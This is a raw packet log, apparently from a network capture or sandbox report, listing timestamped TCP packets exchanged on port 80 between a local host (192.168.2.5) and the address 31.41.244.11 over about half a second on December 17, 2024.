Dec 17, 2024 06:03:30.651747942 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.651932955 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.686615944 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.686808109 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.758845091 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.758904934 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.758955002 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.759015083 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.761197090 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.761280060 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.761317968 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.761425018 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.765464067 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.765552044 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.765575886 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.765598059 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.769920111 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.770046949 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.770087004 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.770087004 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.774308920 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.774422884 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.774456978 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.774482965 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.778747082 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.778800964 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.778863907 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.779094934 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.783173084 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.783299923 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.783301115 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.783359051 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.787566900 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.787648916 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.787662983 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.787812948 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.792073965 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.792232037 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.792296886 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.792454004 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.796412945 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.796504974 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.796561956 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.796627045 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.800889969 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.801037073 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.801109076 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.801326990 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.805262089 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.805320978 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.805371046 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.805427074 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.809684038 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.809827089 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.809828997 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.810121059 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.814136982 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.814265013 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.814266920 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.814321995 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.818532944 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.818641901 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.818648100 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.818945885 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.821983099 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.822082043 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.822108030 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.822186947 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.825496912 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.825614929 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.825650930 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.825679064 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.829015017 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.829200029 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.829608917 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.832498074 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.832619905 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.832850933 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.836034060 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.836152077 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.836337090 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.839521885 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.839596987 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.839636087 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.839850903 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.843036890 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.843153000 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.843214035 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.843297958 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.846489906 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.848267078 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.951001883 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.951045036 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.951184988 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.952312946 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.952409029 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.952474117 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.952548027 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.955065966 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.955193043 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.955281973 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.957824945 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.957967997 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.958041906 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.960664988 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.960747957 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.960943937 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.963356018 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.963422060 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.963424921 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.963507891 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.965938091 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.966065884 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.966078043 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.966217041 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.968521118 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.968600035 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.968687057 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.970963955 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.971118927 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.971221924 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.973438025 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.973586082 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.973753929 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.975931883 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.976061106 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.976257086 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.978408098 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.978516102 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.978564978 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.978743076 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.980890989 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.981034040 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.981084108 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.981206894 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.983388901 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.983452082 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.983503103 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.983503103 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.985908031 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.985995054 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.986037970 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.986138105 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.988373041 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.988507986 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.988569021 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.990947008 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.991023064 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.991031885 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.991286993 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.993365049 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.993547916 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.993705988 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.995826960 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.995994091 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.995997906 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.996056080 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.998358965 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.998452902 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:30.998471022 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:30.998541117 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.000829935 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.000910044 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.000988960 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.001132011 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.003344059 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.003427029 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.003451109 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.003556013 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.005784035 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.005894899 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.005914927 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.006124020 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.008310080 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.008378029 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.008414984 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.008466005 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.010771036 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.010827065 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.010977983 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.013278008 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.013407946 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.013480902 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.015743971 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.015886068 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.016042948 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.016042948 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.018239021 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.018363953 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.018651962 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.020708084 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.020853996 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.021023035 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.023221016 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.023420095 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.023518085 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.023518085 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.025696039 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.025815964 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.026016951 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.143222094 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.143336058 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.143372059 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.143544912 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.144368887 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.144388914 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.144426107 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.144481897 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.146296024 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.146435976 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.146445990 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.146549940 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.148396015 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.148478985 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.148493052 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.148741007 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.150501013 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.150584936 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.150605917 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.150640011 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.152565956 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.152707100 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.152750969 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.152806997 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.154529095 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.154666901 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.154684067 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.154751062 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.156538963 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.156652927 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.156682968 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.156869888 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.158560038 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.158632994 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.158675909 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.159025908 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.160604954 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.160741091 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.160763979 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.160805941 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.162658930 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.162717104 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.162739038 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.162779093 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.164647102 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.164709091 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.164742947 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.164797068 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.166647911 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.166764975 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.166794062 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.166877031 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.168859005 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.168920040 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.168946981 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.169166088 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.170681953 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.170814991 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.170855999 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.170855999 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.172732115 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.172791958 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.172795057 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.174767971 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.174901009 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.174915075 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.174973011 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.176800966 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.176917076 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.176928043 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.176986933 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.178792953 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.178848028 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.178910971 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.178973913 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.180831909 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.180923939 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.180959940 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.181071043 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.182873011 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.182979107 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.183048010 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.183048010 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.184904099 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.185034990 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.185045004 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.185096025 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.186903954 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.186958075 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.186968088 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.187000036 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.188961983 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.189090967 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.189347982 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.189347982 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.190963030 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.191041946 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.191083908 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.191339970 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.193002939 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.193073988 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.193120003 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.193177938 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.195024967 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.195107937 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.195164919 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.195225000 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.197021961 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.197138071 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.197139025 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.197195053 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.199045897 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.199131012 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.199156046 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.199352026 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.201086998 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.201226950 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.201292038 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.201292038 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.203094959 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.203166962 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.203207970 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.203275919 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.205113888 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.205179930 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.205243111 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.205300093 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.207123041 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.207191944 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.207195044 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.207246065 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.209177971 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.209264040 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.209275007 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.209351063 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.211209059 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.211330891 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.211344957 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.211422920 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.213191986 CET	80	49882	31.41.244.11	192.168.2.5
